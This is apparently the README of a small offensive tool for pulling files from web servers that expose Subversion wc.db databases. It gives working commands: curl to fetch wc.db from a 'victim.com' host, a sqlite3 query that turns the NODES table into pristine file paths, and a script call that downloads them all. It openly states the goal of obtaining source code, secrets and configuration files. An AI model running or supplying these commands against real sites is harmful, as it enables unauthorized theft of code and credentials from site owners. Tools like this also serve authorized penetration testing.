Little tool to exploit exposed SVN wc.db files

The tool will download all files that are also visible in the wc.db. This may help you to get access to source code, secrets, configuration files etc.

Download the exposed wc.db file and run the following command on it:

curl -o wc.db https://victim.com/wc.db
sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;' > svn-input.txt

Next run the script using the resulting svn-input.txt file.

./svn-db_parser.sh --baseurl "https://victim.com" --input svn-input.txt --output report